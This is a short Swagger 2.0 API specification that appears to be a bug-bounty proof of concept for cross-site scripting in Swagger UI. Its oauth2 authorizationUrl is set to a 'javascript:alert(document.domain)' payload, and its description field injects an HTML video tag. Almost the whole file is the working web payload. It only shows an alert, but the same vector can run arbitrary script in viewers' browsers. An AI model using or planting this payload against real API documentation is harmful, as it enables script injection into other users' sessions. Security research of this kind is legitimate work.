swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: Bug Hunting is an Art & I am an Artist!  __ @iamarit
  description: <video src=https://youtu.be/Qz1tliPVRvo?si=VyW1Wblkvow9aiNY>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
